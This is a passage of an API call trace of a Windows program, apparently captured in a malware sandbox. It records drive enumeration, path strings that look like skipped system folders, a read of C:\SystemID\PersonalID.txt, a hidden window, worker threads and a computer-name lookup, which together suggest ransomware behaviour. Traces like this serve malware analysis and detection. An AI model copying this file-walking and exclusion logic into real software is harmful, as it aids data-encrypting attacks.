lpWideCharStr="C:\\$Recycle.Bin\\") returned 17 [0178.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a89e80 [0178.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87d68 | out: hHeap=0x2c0000) returned 1 [0178.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3f0) returned 0x2a73d20 [0178.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a79478 | out: hHeap=0x2c0000) returned 1 [0178.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a87d68 [0178.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2a0e780, cbMultiByte=-1, lpWideCharStr=0x2a87d68, cchWideChar=1040 | out: lpWideCharStr="C:\\$WINDOWS.~BT\\") returned 17 [0178.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a8a6b8 [0178.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87d68 | out: hHeap=0x2c0000) returned 1 [0178.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e7a8 [0178.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e7a8 | out: hHeap=0x2c0000) returned 1 [0178.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a87d68 [0178.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2a87d68, cchWideChar=1032 | out: lpWideCharStr="C:\\dell\\") returned 9 [0178.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a8aef0 [0178.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87d68 | out: hHeap=0x2c0000) returned 1 [0178.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2a0e780 [0178.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87d68 | out: hHeap=0x2c0000) returned 1 [0178.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a87d68 | out: hHeap=0x2c0000) returned 1 [0178.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e780 | out: hHeap=0x2c0000) returned 1 [0178.292] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0178.300] GetFileType (hFile=0x4f4) returned 0x1 [0178.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1000) returned 0x2a7b0a0 [0178.301] ReadFile (in: hFile=0x4f4, lpBuffer=0x2a7b0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e820, lpOverlapped=0x0 | out: lpBuffer=0x2a7b0a0*, lpNumberOfBytesRead=0x18e820*=0x2a, lpOverlapped=0x0) returned 1 [0178.302] GetLastError () returned 0x0 [0178.302] ReadFile (in: hFile=0x4f4, lpBuffer=0x2a7b0a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18e820, lpOverlapped=0x0 | out: lpBuffer=0x2a7b0a0*, lpNumberOfBytesRead=0x18e820*=0x0, lpOverlapped=0x0) returned 1 [0178.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7b0a0 | out: hHeap=0x2c0000) returned 1 [0178.303] CloseHandle (hObject=0x4f4) returned 1 [0178.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2e998 | out: hHeap=0x2c0000) returned 1 [0178.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6328 | out: hHeap=0x2c0000) returned 1 [0178.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ea00 | out: hHeap=0x2c0000) returned 1 [0178.310] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.310] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0178.311] RegisterClassExW (param_1=0x18ea30) returned 0xc101 [0178.311] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30144 [0178.342] NtdllDefWindowProc_W () returned 0x0 [0178.342] NtdllDefWindowProc_W () returned 0x1 [0178.345] NtdllDefWindowProc_W () returned 0x0 [0178.349] NtdllDefWindowProc_W () returned 0x0 [0178.349] ShowWindow (hWnd=0x30144, nCmdShow=0) returned 0 [0178.349] UpdateWindow (hWnd=0x30144) returned 1 [0178.349] GetLogicalDrives () returned 0x2000004 [0178.349] SetErrorMode (uMode=0x1) returned 0x0 [0178.349] PathFileExistsA (pszPath="C:\\") returned 1 [0178.350] SetErrorMode (uMode=0x0) returned 0x1 [0178.350] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0178.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x2a92158 [0178.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2a92158, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0178.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a931c0 [0178.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a92158 | out: hHeap=0x2c0000) returned 1 [0178.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6328 [0178.351] SetErrorMode (uMode=0x1) returned 0x0 [0178.351] PathFileExistsA (pszPath="Z:\\") returned 1 [0178.355] SetErrorMode (uMode=0x0) returned 0x1 [0178.355] GetDriveTypeA (lpRootPathName="Z:\\") returned 0x4 [0178.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x2a92158 [0178.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2a92158, cchWideChar=1027 | out: lpWideCharStr="Z:\\") returned 4 [0178.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a95b30 [0178.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a92158 | out: hHeap=0x2c0000) returned 1 [0178.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42468 [0178.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6328 | out: hHeap=0x2c0000) returned 1 [0178.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a931c0 | out: hHeap=0x2c0000) returned 1 [0178.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a95b30 | out: hHeap=0x2c0000) returned 1 [0178.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42468 | out: hHeap=0x2c0000) returned 1 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2e6328 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d298 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x2a7b0a0 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a92158 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a9b7d0 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1070) returned 0x2a7b998 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ea00 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a931c0 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x660) returned 0x2a8f900 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a9c058 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a9c8e0 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a9d168 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a9d9f0 [0178.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2a9e278 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2a98520 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a9eb00 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a9f388 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2a7ca10 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2aa9e20 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2aaa678 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2a9fc10 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aa0498 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2aaaed0 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2aab718 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa0d20 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa15a8 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa1e30 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aa26b8 [0178.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aa2f40 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aa37c8 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa4050 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa48d8 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aa5160 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aa59e8 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2aabf60 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2aac7b8 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aa6270 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aa6af8 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa7380 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2aad010 [0178.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2aad858 [0178.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa7c08 [0178.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa8490 [0178.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aa8d18 [0178.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aae0b8 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aae940 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2aaf1c8 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2aafa50 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ab02d8 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab0b60 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2abe0a0 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2abe8f8 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab13e8 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab1c70 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ab24f8 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ab2d80 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ab3608 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ab3e90 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ab4718 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ab4fa0 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab5828 [0178.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab60b0 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab6938 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ab71c0 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ab7a48 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab82d0 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2abf150 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2abf9a8 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab8b58 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ab93e0 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ab9c68 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2aba4f0 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2abad78 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2abb600 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2abbe88 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2abc710 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2abcf98 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x2a24528 [0178.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac0218 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2a95b30 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ad0200 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ad0a18 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ad1230 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ad1a48 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac0aa0 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac1328 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2e998 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac1bb0 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac2438 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac2cc0 [0178.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3548 [0178.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x2a7b0a8, dwCreationFlags=0x0, lpThreadId=0x2a0d2a0 | out: lpThreadId=0x2a0d2a0*=0x5d8) returned 0x510 [0178.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x5a4) returned 0x514 [0178.366] GetMessageW (in: lpMsg=0x18ebe0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18ebe0) returned 0 [0199.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2af3f88 [0199.997] GetComputerNameW (in: lpBuffer=0x2af3f88, nSize=0x18df5c | out: lpBuffer="Q9IATRKPRH", nSize=0x18df5c) returned 1 [0200.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7630 [0200.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0200.009] IsWindow (hWnd=0x30144) returned 1 [0200.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0200.509] IsWindow (hWnd=0x30144) returned 1 [0200.509] DestroyWindow (hWnd=0x30144) returned 1 [0200.509] NtdllDefWindowProc_W () returned 0x0 [0200.509] PostQuitMessage (nExitCode=0) [0200.510] NtdllDefWindowProc_W () returned 0x0 [0200.512] CloseHandle (hObject=0x4ec) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6328 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e168 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e190 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e280 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e2a8 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e2d0 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e2f8 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x308f80 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42120 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e320 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e348 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e370 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e398 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e3c0 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e3e8 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e410 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a41fd0 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a420b0 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e438 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e460 | out: hHeap=0x2c0000) returned 1 [0200.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e488 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e4b0 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e4d8 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e500 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e528 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e550 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42388 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42318 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e578 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e5a0 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e5c8 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e5f0 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e618 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e640 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e668 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e690 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a423c0 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a423f8 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e6b8 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e6e0 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e708 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e730 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0e758 | out: hHeap=0x2c0000) returned 1 [0200.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7a7c8 | out: hHeap=0x2c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a75ba8 | out: hHeap=0x2c0000) returned 1 [0200.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a74d68 | out: hHeap=0x2c0000) returned 1 [0200.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a09b60 | out: hHeap=0x2c0000) returned 1 [0200.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a07cd0 | out: hHeap=0x2c0000) returned 1 [0200.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42190 | out: hHeap=0x2c0000) returned 1 [0200.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05798 | out: hHeap=0x2c0000) returned 1 [0200.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05750 | out: hHeap=0x2c0000) returned 1 [0200.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adeae8 | out: hHeap=0x2c0000) returned 1 [0200.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adeaa0 | out: hHeap=0x2c0000) returned 1 [0200.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0200.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0200.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0200.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6fa8 | out: hHeap=0x2c0000) returned 1 [0200.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d298 | out: hHeap=0x2c0000) returned 1 [0200.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d32d0 | out: hHeap=0x2c0000) returned 1 [0200.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a4bdf8 | out: hHeap=0x2c0000) returned 1 [0200.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a99e38 | out: hHeap=0x2c0000) returned 1 [0200.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a9a6c0 | out: hHeap=0x2c0000) returned 1 [0200.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 